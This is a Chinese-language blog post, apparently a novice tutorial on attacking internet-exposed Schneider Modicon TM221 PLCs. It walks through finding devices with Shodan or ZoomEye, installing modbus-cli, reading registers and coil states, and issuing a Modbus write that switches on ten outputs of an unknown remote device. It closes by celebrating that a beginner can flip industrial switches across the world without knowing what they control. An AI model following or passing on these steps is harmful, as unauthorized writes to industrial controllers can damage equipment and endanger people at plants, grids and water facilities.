SCADA工控黑客：小白也能「黑」施耐德TM221

簡單介紹：

SCADA/ICS工控安全隨著最近幾年的重大國際安全事件頻發得到了相當的重視黑掉一個發電站、一個水壩、一個工廠都可以引起相當巨大的後果與損失。

我們這篇所說的TM221 Modicon PLC是由施耐德電子開發的一款 PLC（programmabl logic contrllers 可編程邏輯控制器）設備

PLC在工控領域中有相當廣泛的應用如油田、生產線、電網、發電站都有用到。

TM221 Modicon PLC 長這樣：

實驗用的工具 modbus-cli 在kali裡面能夠找到

想了解工控數據交互的同學最好先看下 Modbus : SCADA/ICS 的通訊協協議。

開始黑：

第一步：上 shodan或者zoomeye找TM221===

第二步：安裝 modbus-cli===

進入kali

安裝 modbus-cli

kali > gem install modbus-cli

用法 modbus-cli + 命令

modbus-cli Syntax

我們來看下有哪些命令

kali > modbus -help

基本的命令用法如下

kali > modbus [options] SUBCOMMAND [arguments]

第三部： TM221基本操作語法===

從施耐德的官網上我們找到了基本語法

第四部：用 Modbus-cli 獨處寄存數據===

kali> modbus read %MW100 10

===

命令功能: 用 modbus 讀取前是個 0-9 寄存器的內容。

%MW100 -> 施耐德數據傳輸格式的的頭

10 -> 讀取寄存器數量

kali > modbus read 400101 10

============================

命令功能: 用 modbus 讀取前是個 0-9 寄存器的內容。

400101 -> 施耐德子牌 modicon 數據傳輸格式的的頭在這款PLC也可以使用效果相同

10 -> 讀取寄存器數量

第五步：讀取線圈開關狀態===

當我們用%M100去做讀取操作時如上表會返回一個布爾值。

這個值就代表這個線圈開關的狀態，如果這個值為1則對應控制的設備就處於通電工作的狀態。

圖中返回值顯示目前 100 102 104 都處於開啟狀態

第六步：打開開關===

kali > modbus write %MW100 1 1 1 1 1 1 1 1 1 1

請求結束後我們在讀取看看狀態？

全打開了！！！

結論：

就這麼簡單。世界的另一頭10個開關就被小白打開了，對應的設備是什麼呢？那就不得而知了~

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！